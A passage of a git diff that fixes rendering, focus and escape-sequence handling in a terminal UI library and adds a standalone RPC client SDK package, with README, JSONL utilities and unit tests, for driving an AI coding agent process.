b/packages/pi-tui/src/components/editor.ts index c9cefb83c..b370445c9 100644 --- a/packages/pi-tui/src/components/editor.ts +++ b/packages/pi-tui/src/components/editor.ts @@ -128,7 +128,17 @@ export class Editor implements Component, Focusable { }; /** Focusable interface - set by TUI when focus changes */ - focused: boolean = false; + private _focused: boolean = false; + get focused(): boolean { + return this._focused; + } + set focused(value: boolean) { + this._focused = value; + if (!value) { + this.isInPaste = false; + this.pasteBuffer = ""; + } + } protected tui: TUI; private theme: EditorTheme; @@ -376,8 +386,9 @@ export class Editor implements Component, Focusable { } // Render each visible layout line - // Emit hardware cursor marker only when focused and not showing autocomplete - const emitCursorMarker = this.focused && !this.autocompleteState; + // Keep the hardware cursor anchored while autocomplete is open so IME + // candidate windows still attach to the editor caret. + const emitCursorMarker = this.focused; for (const layoutLine of visibleLines) { let displayText = layoutLine.text; diff --git a/packages/pi-tui/src/components/image.test.ts b/packages/pi-tui/src/components/image.test.ts new file mode 100644 index 000000000..3bef04a85 --- /dev/null +++ b/packages/pi-tui/src/components/image.test.ts @@ -0,0 +1,36 @@ +/** + * Regression test for #3455: Image component must not trigger infinite + * re-render loop when dimensions resolve in cmux sessions. 
+ */ + +import { describe, test } from "node:test"; +import assert from "node:assert/strict"; +import { Image } from "./image.js"; + +describe("Image component (#3455)", () => { + const theme = { fallbackColor: (s: string) => s }; + + test("getDimensions returns undefined before resolution", () => { + // Pass explicit dimensions to avoid async parsing + const img = new Image("base64data", "image/png", theme, {}); + // Without explicit dims, getDimensions should be undefined until async resolve + // But we can't easily test async here, so verify the method exists + assert.equal(typeof img.getDimensions, "function"); + }); + + test("getDimensions returns dimensions when provided at construction", () => { + const dims = { widthPx: 100, heightPx: 200 }; + const img = new Image("base64data", "image/png", theme, {}, dims); + const result = img.getDimensions(); + assert.deepEqual(result, dims, "Should return provided dimensions"); + }); + + test("onDimensionsResolved callback is not called when dimensions provided", () => { + let callCount = 0; + const dims = { widthPx: 100, heightPx: 200 }; + const img = new Image("base64data", "image/png", theme, {}, dims); + img.setOnDimensionsResolved(() => { callCount++; }); + // With pre-resolved dims, the async path is skipped entirely + assert.equal(callCount, 0, "Callback should not fire for pre-resolved dimensions"); + }); +}); diff --git a/packages/pi-tui/src/components/image.ts b/packages/pi-tui/src/components/image.ts index c789a0a5b..814167605 100644 --- a/packages/pi-tui/src/components/image.ts +++ b/packages/pi-tui/src/components/image.ts @@ -72,6 +72,11 @@ export class Image implements Component { return this.imageId; } + /** Get the resolved image dimensions (for caching across recreations). */ + getDimensions(): ImageDimensions | undefined { + return this.dimensionsResolved ? 
this.dimensions : undefined; + } + invalidate(): void { this.cachedLines = undefined; this.cachedWidth = undefined; diff --git a/packages/pi-tui/src/components/loader.ts b/packages/pi-tui/src/components/loader.ts index a55a2570c..5115f8337 100644 --- a/packages/pi-tui/src/components/loader.ts +++ b/packages/pi-tui/src/components/loader.ts @@ -2,13 +2,16 @@ import type { TUI } from "../tui.js"; import { Text } from "./text.js"; /** - * Loader component that updates every 80ms with spinning animation + * Loader component that updates every 80ms with spinning animation. + * Frame rotation is isolated from message text to avoid invalidating + * Text's render cache (wrapTextWithAnsi, visibleWidth) on every tick. */ export class Loader extends Text { private frames = ["⠋", "⠙", "⠹", "⠸", "⠼", "⠴", "⠦", "⠧", "⠇", "⠏"]; private currentFrame = 0; private intervalId: NodeJS.Timeout | null = null; private ui: TUI | null = null; + private _lastMessage: string = ""; constructor( ui: TUI, @@ -22,18 +25,38 @@ export class Loader extends Text { } render(width: number): string[] { - return ["", ...super.render(width)]; + // Only update Text content when message actually changes — + // frame rotation is prepended below without touching the cache + if (this.message !== this._lastMessage) { + this.setText(this.messageColorFn(this.message)); + this._lastMessage = this.message; + } + const messageLines = super.render(width); + // Shallow copy so we don't mutate cachedLines from Text + const result = ["", ...messageLines]; + // Prepend spinner frame to first content line + if (result.length > 1) { + const frame = this.frames[this.currentFrame]; + result[1] = this.spinnerColorFn(frame) + " " + result[1]; + } + return result; } start() { if (this.intervalId) { clearInterval(this.intervalId); } - this.updateDisplay(); + this.currentFrame = 0; this.intervalId = setInterval(() => { this.currentFrame = (this.currentFrame + 1) % this.frames.length; - this.updateDisplay(); + if (this.ui) { + 
this.ui.requestRender(); + } }, 80); + // Trigger initial render + if (this.ui) { + this.ui.requestRender(); + } } stop() { @@ -50,12 +73,6 @@ export class Loader extends Text { setMessage(message: string) { this.message = message; - this.updateDisplay(); - } - - private updateDisplay() { - const frame = this.frames[this.currentFrame]; - this.setText(`${this.spinnerColorFn(frame)} ${this.messageColorFn(this.message)}`); if (this.ui) { this.ui.requestRender(); } diff --git a/packages/pi-tui/src/components/text.ts b/packages/pi-tui/src/components/text.ts index efcf25b45..a9519bfdf 100644 --- a/packages/pi-tui/src/components/text.ts +++ b/packages/pi-tui/src/components/text.ts @@ -23,6 +23,7 @@ export class Text implements Component { } setText(text: string): void { + if (this.text === text) return; this.text = text; this.cachedText = undefined; this.cachedWidth = undefined; diff --git a/packages/pi-tui/src/overlay-layout.ts b/packages/pi-tui/src/overlay-layout.ts index 1896c5bba..5e306ec91 100644 --- a/packages/pi-tui/src/overlay-layout.ts +++ b/packages/pi-tui/src/overlay-layout.ts @@ -6,7 +6,7 @@ */ import type { OverlayAnchor, OverlayOptions, SizeValue } from "./tui.js"; -import { extractSegments, sliceByColumn, sliceWithWidth, truncateToWidth, visibleWidth } from "./utils.js"; +import { applyBackgroundToLine, extractSegments, sliceByColumn, sliceWithWidth, truncateToWidth, visibleWidth } from "./utils.js"; import { isImageLine } from "./terminal-image.js"; import { CURSOR_MARKER } from "./tui.js"; @@ -324,6 +324,18 @@ export function compositeOverlays( const viewportStart = Math.max(0, workingHeight - termHeight); + // Apply backdrop dimming if any visible overlay requests it. + // Uses dim + gray foreground so text fades without painting empty lines. 
+ const hasBackdrop = visibleEntries.some((e) => e.options?.backdrop); + if (hasBackdrop) { + const dimFn = (text: string) => `\x1b[2m\x1b[38;5;240m${text}\x1b[39m\x1b[22m`; + for (let i = viewportStart; i < result.length; i++) { + if (!isImageLine(result[i]) && result[i].length > 0) { + result[i] = applyBackgroundToLine(result[i], termWidth, dimFn); + } + } + } + // Composite each overlay for (const { overlayLines, row, col, w } of rendered) { for (let i = 0; i < overlayLines.length; i++) { diff --git a/packages/pi-tui/src/stdin-buffer.ts b/packages/pi-tui/src/stdin-buffer.ts index 5b2f977b0..ea2baec91 100644 --- a/packages/pi-tui/src/stdin-buffer.ts +++ b/packages/pi-tui/src/stdin-buffer.ts @@ -361,6 +361,13 @@ export class StdinBuffer extends EventEmitter { return []; } + // Keep incomplete escape prefixes buffered so split CSI/mouse/focus + // sequences do not get emitted as literal text on timeout. + // A lone ESC is still flushed so an actual Escape keypress is not lost. + if (this.buffer.length > 1 && this.buffer.startsWith(ESC) && isCompleteSequence(this.buffer) === "incomplete") { + return []; + } + const sequences = [this.buffer]; this.buffer = ""; return sequences; diff --git a/packages/pi-tui/src/terminal.ts b/packages/pi-tui/src/terminal.ts index 52bb27ad3..ff84a6283 100644 --- a/packages/pi-tui/src/terminal.ts +++ b/packages/pi-tui/src/terminal.ts @@ -9,6 +9,9 @@ const cjsRequire = createRequire(import.meta.url); * Minimal terminal interface for TUI */ export interface Terminal { + // Whether stdout is a real TTY (false for pipes, e.g. 
RPC bridge processes) + readonly isTTY: boolean; + // Start the terminal with input and resize handlers start(onInput: (data: string) => void, onResize: () => void): void; @@ -63,11 +66,22 @@ export class ProcessTerminal implements Terminal { private stdinDataHandler?: (data: string) => void; private writeLogPath = process.env.PI_TUI_WRITE_LOG || ""; + get isTTY(): boolean { + return !!process.stdout.isTTY; + } + get kittyProtocolActive(): boolean { return this._kittyProtocolActive; } start(onInput: (data: string) => void, onResize: () => void): void { + // Non-TTY stdout (pipe) — skip TUI initialization entirely. + // RPC bridge processes communicate via JSON, not terminal escape codes. + // Without this guard, the render loop burns 500%+ CPU. (issue #3095) + if (!this.isTTY) { + return; + } + this.inputHandler = onInput; this.resizeHandler = onResize; diff --git a/packages/pi-tui/src/tui.ts b/packages/pi-tui/src/tui.ts index d0154b0ce..7c58c0145 100644 --- a/packages/pi-tui/src/tui.ts +++ b/packages/pi-tui/src/tui.ts @@ -141,6 +141,8 @@ export interface OverlayOptions { visible?: (termWidth: number, termHeight: number) => boolean; /** If true, don't capture keyboard focus when shown */ nonCapturing?: boolean; + /** If true, dim the background behind the overlay */ + backdrop?: boolean; } /** @@ -166,20 +168,33 @@ export interface OverlayHandle { */ export class Container implements Component { children: Component[] = []; + private _prevRender: string[] | null = null; addChild(component: Component): void { this.children.push(component); + this._prevRender = null; } removeChild(component: Component): void { const index = this.children.indexOf(component); if (index !== -1) { + const child = this.children[index]; this.children.splice(index, 1); + if ('dispose' in child && typeof (child as any).dispose === 'function') { + (child as any).dispose(); + } + this._prevRender = null; } } clear(): void { + for (const child of this.children) { + if ('dispose' in child && 
typeof (child as any).dispose === 'function') { + (child as any).dispose(); + } + } this.children = []; + this._prevRender = null; } invalidate(): void { @@ -194,6 +209,17 @@ export class Container implements Component { const rendered = child.render(width); for (let i = 0; i < rendered.length; i++) lines.push(rendered[i]); } + // Return stable reference if output unchanged — allows doRender() + // to skip ALL post-processing (isImageLine, applyLineResets, diffs) + const prev = this._prevRender; + if (prev && prev.length === lines.length) { + let same = true; + for (let i = 0; i < lines.length; i++) { + if (lines[i] !== prev[i]) { same = false; break; } + } + if (same) return prev; + } + this._prevRender = lines; return lines; } } @@ -222,6 +248,7 @@ export class TUI extends Container { private previousViewportTop = 0; // Track previous viewport top for resize-aware cursor moves private fullRedrawCount = 0; private stopped = false; + private _lastRenderedComponents: string[] | null = null; // Overlay stack for modal components rendered on top of base content private focusOrderCounter = 0; @@ -399,6 +426,12 @@ export class TUI extends Container { start(): void { this.stopped = false; + // Non-TTY stdout (pipe) — skip TUI entirely to avoid burning CPU. + // RPC bridge processes have piped stdio; rendering ANSI escape codes + // to a pipe is pure waste and causes a runaway render loop. 
(issue #3095) + if (!this.terminal.isTTY) { + return; + } this.terminal.start( (data) => this.handleInput(data), () => this.requestRender(), @@ -458,6 +491,8 @@ export class TUI extends Container { } requestRender(force = false): void { + // Skip rendering on non-TTY stdout to prevent CPU burn (issue #3095) + if (!this.terminal.isTTY) return; if (force) { this.previousLines = []; this.previousWidth = -1; // -1 triggers widthChanged, forcing a full clear @@ -555,6 +590,15 @@ export class TUI extends Container { this.cellSizeQueryPending = false; } + // Don't hold a bare Escape keypress hostage while waiting for the + // optional cell-size response. This is the most common early input race. + if (this.inputBuffer === "\x1b") { + const result = this.inputBuffer; + this.inputBuffer = ""; + this.cellSizeQueryPending = false; + return result; + } + // Check if we have a partial cell size response starting (wait for more data) // Patterns that could be incomplete cell size response: \x1b, \x1b[, \x1b[6, \x1b[6;...(no t yet) const partialCellSizePattern = /\x1b(\[6?;?[\d;]*)?$/; @@ -591,6 +635,13 @@ export class TUI extends Container { // Render all components to get new lines let newLines = this.render(width); + // Skip ALL post-processing if component output is unchanged. + // Container.render() returns the same array reference when stable. 
+ if (newLines === this._lastRenderedComponents && this.overlayStack.length === 0) { + return; + } + this._lastRenderedComponents = newLines; + // Composite overlays into the rendered lines (before differential compare) if (this.overlayStack.length > 0) { newLines = compositeOverlays(newLines, this.overlayStack, width, height, this.maxLinesRendered); diff --git a/packages/rpc-client/.npmignore b/packages/rpc-client/.npmignore new file mode 100644 index 000000000..5aedf8f6e --- /dev/null +++ b/packages/rpc-client/.npmignore @@ -0,0 +1 @@ +dist/*.test.* diff --git a/packages/rpc-client/README.md b/packages/rpc-client/README.md new file mode 100644 index 000000000..6dcad70e6 --- /dev/null +++ b/packages/rpc-client/README.md @@ -0,0 +1,125 @@ +# @gsd-build/rpc-client + +Standalone RPC client SDK for GSD. Spawn the agent process, perform a v2 protocol handshake, send commands, and consume typed events via an async generator — all in a few lines of TypeScript. + +Zero internal dependencies. Ships its own inlined types. 
+ +## Installation + +```bash +npm install @gsd-build/rpc-client +``` + +## Quick Start + +```typescript +import { RpcClient } from '@gsd-build/rpc-client'; + +const client = new RpcClient({ cwd: process.cwd() }); +await client.start(); +const { sessionId } = await client.init({ clientId: 'my-app' }); +console.log(`Session: ${sessionId}`); + +await client.prompt('Create a hello world script'); +for await (const event of client.events()) { + if (event.type === 'execution_complete') break; + console.log(event.type); +} +await client.shutdown(); +``` + +## API + +### Constructor + +```typescript +const client = new RpcClient(options?: RpcClientOptions); +``` + +| Option | Type | Description | +|------------|--------------------------|------------------------------------------| +| `cliPath` | `string` | Path to the CLI entry point | +| `cwd` | `string` | Working directory for the agent | +| `env` | `Record` | Environment variables | +| `provider` | `string` | AI provider (e.g. `"anthropic"`) | +| `model` | `string` | Model ID (e.g. 
`"claude-sonnet"`) | +| `args` | `string[]` | Additional CLI arguments | + +### Lifecycle + +| Method | Description | +|---------------|------------------------------------------------| +| `start()` | Spawn the agent process | +| `init(opts?)` | v2 handshake — returns `sessionId`, capabilities | +| `shutdown()` | Graceful shutdown | +| `stop()` | Force-kill the process | + +### Commands + +| Method | Description | +|--------------------------------|----------------------------------------| +| `prompt(message, images?)` | Send a prompt | +| `steer(message, images?)` | Interrupt with a steering message | +| `followUp(message, images?)` | Queue a follow-up message | +| `abort()` | Abort current operation | +| `subscribe(events)` | Subscribe to event types (`["*"]` for all) | + +### Events + +```typescript +// Async generator — recommended +for await (const event of client.events()) { + console.log(event.type); +} + +// Callback-based +const unsubscribe = client.onEvent((event) => { + console.log(event.type); +}); +``` + +### Helpers + +| Method | Description | +|---------------------------------------|------------------------------------------| +| `waitForIdle(timeout?)` | Wait for `agent_end` event | +| `collectEvents(timeout?)` | Collect events until idle | +| `promptAndWait(message, images?, t?)` | Send prompt and collect events | + +### Session & Model + +| Method | Description | +|----------------------------------|-----------------------------------| +| `getState()` | Get session state | +| `setModel(provider, modelId)` | Set model | +| `cycleModel()` | Cycle to next model | +| `getAvailableModels()` | List available models | +| `setThinkingLevel(level)` | Set thinking level | +| `cycleThinkingLevel()` | Cycle thinking level | +| `compact(instructions?)` | Compact session context | +| `getSessionStats()` | Get session statistics | +| `bash(command)` | Execute a bash command | +| `newSession(parent?)` | Start a new session | +| `sendUIResponse(id, response)` | 
Respond to extension UI requests | + +## Type Exports + +All protocol types are exported from the package root: + +```typescript +import type { + RpcCommand, + RpcResponse, + RpcInitResult, + RpcExecutionCompleteEvent, + RpcCostUpdateEvent, + RpcV2Event, + SessionStats, + SdkAgentEvent, + RpcClientOptions, +} from '@gsd-build/rpc-client'; +``` + +## License + +MIT diff --git a/packages/rpc-client/examples/basic-usage.ts b/packages/rpc-client/examples/basic-usage.ts new file mode 100644 index 000000000..3248799b4 --- /dev/null +++ b/packages/rpc-client/examples/basic-usage.ts @@ -0,0 +1,13 @@ +import { RpcClient } from '@gsd-build/rpc-client'; + +const client = new RpcClient({ cwd: process.cwd() }); +await client.start(); +const { sessionId } = await client.init({ clientId: 'my-app' }); +console.log(`Session: ${sessionId}`); + +await client.prompt('Create a hello world script'); +for await (const event of client.events()) { + if (event.type === 'execution_complete') break; + console.log(event.type); +} +await client.shutdown(); diff --git a/packages/rpc-client/package.json b/packages/rpc-client/package.json new file mode 100644 index 000000000..934be48ab --- /dev/null +++ b/packages/rpc-client/package.json @@ -0,0 +1,34 @@ +{ + "name": "@gsd-build/rpc-client", + "version": "2.52.0", + "description": "Standalone RPC client SDK for GSD — zero internal dependencies", + "license": "MIT", + "repository": { + "type": "git", + "url": "https://github.com/gsd-build/gsd-2.git", + "directory": "packages/rpc-client" + }, + "publishConfig": { + "access": "public" + }, + "type": "module", + "main": "./dist/index.js", + "types": "./dist/index.d.ts", + "exports": { + ".": { + "types": "./dist/index.d.ts", + "import": "./dist/index.js" + } + }, + "files": [ + "dist", + "!dist/**/*.test.*" + ], + "scripts": { + "build": "tsc -p tsconfig.json", + "test": "node --test dist/rpc-client.test.js" + }, + "engines": { + "node": ">=22.0.0" + } +} diff --git a/packages/rpc-client/src/index.ts 
b/packages/rpc-client/src/index.ts new file mode 100644 index 000000000..3771a3359 --- /dev/null +++ b/packages/rpc-client/src/index.ts @@ -0,0 +1,10 @@ +/** + * @gsd-build/rpc-client — standalone RPC client SDK for GSD. + * + * Re-exports all types, JSONL utilities, and the RpcClient class. + */ + +export * from "./rpc-types.js"; +export { serializeJsonLine, attachJsonlLineReader } from "./jsonl.js"; +export { RpcClient } from "./rpc-client.js"; +export type { RpcClientOptions, RpcEventListener, SdkAgentEvent } from "./rpc-client.js"; diff --git a/packages/rpc-client/src/jsonl.ts b/packages/rpc-client/src/jsonl.ts new file mode 100644 index 000000000..5392defef --- /dev/null +++ b/packages/rpc-client/src/jsonl.ts @@ -0,0 +1,64 @@ +import type { Readable } from "node:stream"; +import { StringDecoder } from "node:string_decoder"; + +/** + * Serialize a single strict JSONL record. + * + * Framing is LF-only. Payload strings may contain other Unicode separators such as + * U+2028 and U+2029. Clients must split records on `\n` only. + */ +export function serializeJsonLine(value: unknown): string { + return `${JSON.stringify(value)}\n`; +} + +/** + * Attach an LF-only JSONL reader to a stream. + * + * This intentionally does not use Node readline. Readline splits on additional + * Unicode separators that are valid inside JSON strings and therefore does not + * implement strict JSONL framing. + */ +export function attachJsonlLineReader(stream: Readable, onLine: (line: string) => void): () => void { + const decoder = new StringDecoder("utf8"); + let buffer = ""; + + const emitLine = (line: string) => { + onLine(line.endsWith("\r") ? line.slice(0, -1) : line); + }; + + const onData = (chunk: string | Buffer) => { + buffer += typeof chunk === "string" ? 
chunk : decoder.write(chunk); + + while (true) { + const newlineIndex = buffer.indexOf("\n"); + if (newlineIndex === -1) { + return; + } + + emitLine(buffer.slice(0, newlineIndex)); + buffer = buffer.slice(newlineIndex + 1); + } + }; + + const onEnd = () => { + buffer += decoder.end(); + if (buffer.length > 0) { + emitLine(buffer); + buffer = ""; + } + }; + + const onError = (_err: Error) => { + // Stream errors are non-fatal for JSONL reading + }; + + stream.on("data", onData); + stream.on("end", onEnd); + stream.on("error", onError); + + return () => { + stream.off("data", onData); + stream.off("end", onEnd); + stream.off("error", onError); + }; +} diff --git a/packages/rpc-client/src/rpc-client.test.ts b/packages/rpc-client/src/rpc-client.test.ts new file mode 100644 index 000000000..9fcb7874f --- /dev/null +++ b/packages/rpc-client/src/rpc-client.test.ts @@ -0,0 +1,568 @@ +import { describe, it, beforeEach, afterEach } from "node:test"; +import assert from "node:assert/strict"; +import { PassThrough } from "node:stream"; +import { serializeJsonLine, attachJsonlLineReader } from "./jsonl.js"; +import type { + RpcInitResult, + RpcExecutionCompleteEvent, + RpcCostUpdateEvent, + RpcProtocolVersion, + SessionStats, + RpcV2Event, +} from "./rpc-types.js"; +import { RpcClient } from "./rpc-client.js"; +import type { SdkAgentEvent } from "./rpc-client.js"; + +// ============================================================================ +// JSONL Tests +// ============================================================================ + +describe("serializeJsonLine", () => { + it("produces valid JSON terminated with LF", () => { + const result = serializeJsonLine({ type: "test", value: 42 }); + assert.ok(result.endsWith("\n"), "must end with LF"); + const parsed = JSON.parse(result.trim()); + assert.equal(parsed.type, "test"); + assert.equal(parsed.value, 42); + }); + + it("serializes strings with special characters", () => { + const result = serializeJsonLine({ msg: 
"hello\nworld" }); + assert.ok(result.endsWith("\n")); + // The embedded \n must be escaped inside the JSON — only the trailing LF is the framing delimiter + const lines = result.split("\n"); + // Should be exactly 2 parts: the JSON line and the empty string after trailing LF + assert.equal(lines.length, 2); + assert.equal(lines[1], ""); + const parsed = JSON.parse(lines[0]); + assert.equal(parsed.msg, "hello\nworld"); + }); + + it("handles empty objects", () => { + const result = serializeJsonLine({}); + assert.equal(result, "{}\n"); + }); +}); + +describe("attachJsonlLineReader", () => { + it("splits on LF correctly", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + attachJsonlLineReader(stream, (line) => lines.push(line)); + + stream.write('{"a":1}\n{"b":2}\n'); + stream.end(); + + // Let microtask queue flush + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(lines.length, 2); + assert.equal(JSON.parse(lines[0]).a, 1); + assert.equal(JSON.parse(lines[1]).b, 2); + }); + + it("handles chunked data across boundaries", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + attachJsonlLineReader(stream, (line) => lines.push(line)); + + // Write in fragments that split mid-line + stream.write('{"type":"hel'); + stream.write('lo"}\n{"type":"w'); + stream.write('orld"}\n'); + stream.end(); + + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(lines.length, 2); + assert.equal(JSON.parse(lines[0]).type, "hello"); + assert.equal(JSON.parse(lines[1]).type, "world"); + }); + + it("emits trailing data on stream end", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + attachJsonlLineReader(stream, (line) => lines.push(line)); + + stream.write('{"final":true}'); + stream.end(); + + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(lines.length, 1); + assert.equal(JSON.parse(lines[0]).final, true); + }); + + it("returns a detach function that 
stops reading", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + const detach = attachJsonlLineReader(stream, (line) => lines.push(line)); + + stream.write('{"a":1}\n'); + await new Promise((r) => setTimeout(r, 10)); + assert.equal(lines.length, 1); + + detach(); + + stream.write('{"b":2}\n'); + stream.end(); + await new Promise((r) => setTimeout(r, 10)); + + // Should still be 1 — detach removed listeners + assert.equal(lines.length, 1); + }); + + it("strips CR from CRLF line endings", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + attachJsonlLineReader(stream, (line) => lines.push(line)); + + stream.write('{"v":1}\r\n'); + stream.end(); + + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(lines.length, 1); + assert.equal(JSON.parse(lines[0]).v, 1); + }); +}); + +// ============================================================================ +// Type Shape Tests +// ============================================================================ + +describe("type shapes", () => { + it("RpcInitResult has protocolVersion, sessionId, capabilities", () => { + const init: RpcInitResult = { + protocolVersion: 2, + sessionId: "sess_123", + capabilities: { + events: ["execution_complete", "cost_update"], + commands: ["prompt", "steer"], + }, + }; + assert.equal(init.protocolVersion, 2); + assert.equal(init.sessionId, "sess_123"); + assert.ok(Array.isArray(init.capabilities.events)); + assert.ok(Array.isArray(init.capabilities.commands)); + }); + + it("RpcExecutionCompleteEvent has required fields", () => { + const event: RpcExecutionCompleteEvent = { + type: "execution_complete", + runId: "run_abc", + status: "completed", + stats: { + sessionFile: "/tmp/session.json", + sessionId: "sess_123", + userMessages: 5, + assistantMessages: 5, + toolCalls: 3, + toolResults: 3, + totalMessages: 10, + tokens: { input: 1000, output: 500, cacheRead: 200, cacheWrite: 100, total: 1800 }, + cost: 0.05, + }, 
+ }; + assert.equal(event.type, "execution_complete"); + assert.equal(event.runId, "run_abc"); + assert.equal(event.status, "completed"); + assert.ok(event.stats); + assert.equal(event.stats.sessionId, "sess_123"); + }); + + it("RpcCostUpdateEvent has required fields", () => { + const event: RpcCostUpdateEvent = { + type: "cost_update", + runId: "run_abc", + turnCost: 0.01, + cumulativeCost: 0.05, + tokens: { input: 500, output: 200, cacheRead: 100, cacheWrite: 50 }, + }; + assert.equal(event.type, "cost_update"); + assert.equal(event.runId, "run_abc"); + assert.equal(event.turnCost, 0.01); + assert.equal(event.cumulativeCost, 0.05); + assert.ok(event.tokens); + }); + + it("SessionStats has all expected fields", () => { + const stats: SessionStats = { + sessionFile: "/tmp/session.json", + sessionId: "s1", + userMessages: 10, + assistantMessages: 10, + toolCalls: 5, + toolResults: 5, + totalMessages: 20, + tokens: { input: 2000, output: 1000, cacheRead: 500, cacheWrite: 200, total: 3700 }, + cost: 0.10, + }; + assert.equal(stats.sessionId, "s1"); + assert.equal(stats.userMessages, 10); + assert.equal(stats.tokens.total, 3700); + assert.equal(stats.cost, 0.10); + }); + + it("RpcProtocolVersion accepts 1 and 2", () => { + const v1: RpcProtocolVersion = 1; + const v2: RpcProtocolVersion = 2; + assert.equal(v1, 1); + assert.equal(v2, 2); + }); + + it("RpcV2Event discriminated union covers both event types", () => { + const events: RpcV2Event[] = [ + { + type: "execution_complete", + runId: "r1", + status: "completed", + stats: { + sessionFile: undefined, + sessionId: "s1", + userMessages: 1, + assistantMessages: 1, + toolCalls: 0, + toolResults: 0, + totalMessages: 2, + tokens: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0, total: 150 }, + cost: 0.001, + }, + }, + { + type: "cost_update", + runId: "r1", + turnCost: 0.001, + cumulativeCost: 0.001, + tokens: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0 }, + }, + ]; + assert.equal(events.length, 2); + 
assert.equal(events[0].type, "execution_complete"); + assert.equal(events[1].type, "cost_update"); + }); +}); + +// ============================================================================ +// RpcClient Construction Tests +// ============================================================================ + +describe("RpcClient construction", () => { + it("creates with default options", () => { + const client = new RpcClient(); + assert.ok(client); + }); + + it("creates with custom options", () => { + const client = new RpcClient({ + cliPath: "/usr/local/bin/gsd", + cwd: "/tmp", + env: { NODE_ENV: "test" }, + provider: "anthropic", + model: "claude-sonnet", + args: ["--verbose"], + }); + assert.ok(client); + }); +}); + +// ============================================================================ +// events() Generator Tests +// ============================================================================ + +describe("events() async generator", () => { + it("yields events from a mock stream in order", async () => { + const client = new RpcClient(); + + // Reach into the client to set up a mock process with a PassThrough stdout + const mockStdout = new PassThrough(); + const mockStderr = new PassThrough(); + const mockStdin = new PassThrough(); + + // Simulate a started process by setting internal state + // We use Object.assign to set private fields for testing + const clientAny = client as any; + clientAny.process = { + stdout: mockStdout, + stderr: mockStderr, + stdin: mockStdin, + exitCode: null, + kill: () => {}, + on: (event: string, handler: (...args: any[]) => void) => { + if (event === "exit") { + // Store exit handler so we can trigger it + clientAny._testExitHandler = handler; + } + }, + removeListener: () => {}, + }; + + // Attach the JSONL reader like start() does + clientAny.stopReadingStdout = attachJsonlLineReader(mockStdout, (line: string) => { + clientAny.handleLine(line); + }); + + // Collect events from the generator + const received: 
SdkAgentEvent[] = []; + const genPromise = (async () => { + for await (const event of client.events()) { + received.push(event); + if (event.type === "done") break; + } + })(); + + // Simulate server sending events + await new Promise((r) => setTimeout(r, 20)); + mockStdout.write(serializeJsonLine({ type: "agent_start", runId: "r1" })); + await new Promise((r) => setTimeout(r, 20)); + mockStdout.write(serializeJsonLine({ type: "token", text: "hello" })); + await new Promise((r) => setTimeout(r, 20)); + mockStdout.write(serializeJsonLine({ type: "done" })); + + await genPromise; + + assert.equal(received.length, 3); + assert.equal(received[0].type, "agent_start"); + assert.equal(received[1].type, "token"); + assert.equal(received[2].type, "done"); + }); + + it("terminates when process exits", async () => { + const client = new RpcClient(); + const mockStdout = new PassThrough(); + const mockStderr = new PassThrough(); + const mockStdin = new PassThrough(); + + const exitHandlers: Array<() => void> = []; + const clientAny = client as any; + clientAny.process = { + stdout: mockStdout, + stderr: mockStderr, + stdin: mockStdin, + exitCode: null, + kill: () => {}, + on: (event: string, handler: () => void) => { + if (event === "exit") exitHandlers.push(handler); + }, + removeListener: (event: string, handler: () => void) => { + const idx = exitHandlers.indexOf(handler); + if (idx !== -1) exitHandlers.splice(idx, 1); + }, + }; + + clientAny.stopReadingStdout = attachJsonlLineReader(mockStdout, (line: string) => { + clientAny.handleLine(line); + }); + + const received: SdkAgentEvent[] = []; + const genPromise = (async () => { + for await (const event of client.events()) { + received.push(event); + } + })(); + + // Send one event, then simulate process exit + await new Promise((r) => setTimeout(r, 20)); + mockStdout.write(serializeJsonLine({ type: "agent_start" })); + await new Promise((r) => setTimeout(r, 20)); + + // Fire exit handlers + for (const h of exitHandlers) h(); 
+ + await genPromise; + + assert.equal(received.length, 1); + assert.equal(received[0].type, "agent_start"); + }); + + it("throws if client not started", async () => { + const client = new RpcClient(); + await assert.rejects(async () => { + // eslint-disable-next-line @typescript-eslint/no-unused-vars + for await (const _event of client.events()) { + // should not reach + } + }, /Client not started/); + }); +}); + +// ============================================================================ +// sendUIResponse Serialization Test +// ============================================================================ + +describe("sendUIResponse serialization", () => { + it("writes correct JSONL to stdin", () => { + const client = new RpcClient(); + const chunks: string[] = []; + const mockStdin = { + write: (data: string) => { + chunks.push(data); + return true; + }, + }; + + const clientAny = client as any; + clientAny.process = { stdin: mockStdin }; + + client.sendUIResponse("ui_1", { value: "hello" }); + + assert.equal(chunks.length, 1); + const parsed = JSON.parse(chunks[0].trim()); + assert.equal(parsed.type, "extension_ui_response"); + assert.equal(parsed.id, "ui_1"); + assert.equal(parsed.value, "hello"); + }); + + it("serializes confirmed response", () => { + const client = new RpcClient(); + const chunks: string[] = []; + const mockStdin = { + write: (data: string) => { + chunks.push(data); + return true; + }, + }; + const clientAny = client as any; + clientAny.process = { stdin: mockStdin }; + + client.sendUIResponse("ui_2", { confirmed: true }); + + const parsed = JSON.parse(chunks[0].trim()); + assert.equal(parsed.confirmed, true); + assert.equal(parsed.id, "ui_2"); + }); + + it("serializes cancelled response", () => { + const client = new RpcClient(); + const chunks: string[] = []; + const mockStdin = { + write: (data: string) => { + chunks.push(data); + return true; + }, + }; + const clientAny = client as any; + clientAny.process = { stdin: mockStdin }; + + 
